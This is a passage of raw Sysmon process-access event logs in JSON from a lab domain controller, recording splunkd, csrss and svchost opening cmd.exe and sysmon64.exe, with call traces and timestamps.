07:53:28.439","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3880","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F78-5F25-0000-001055F70300}","TargetProcessId":"3944","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2129,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.439\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F78-5F25-0000-001055F70300}\r\nTargetProcessId: 3944\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.439","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F78-5F25-0000-001055F70300}","TargetProcessId":"3944","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2130,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2131,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2132,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2133,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2134,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2135,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2136,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.439\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.439","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 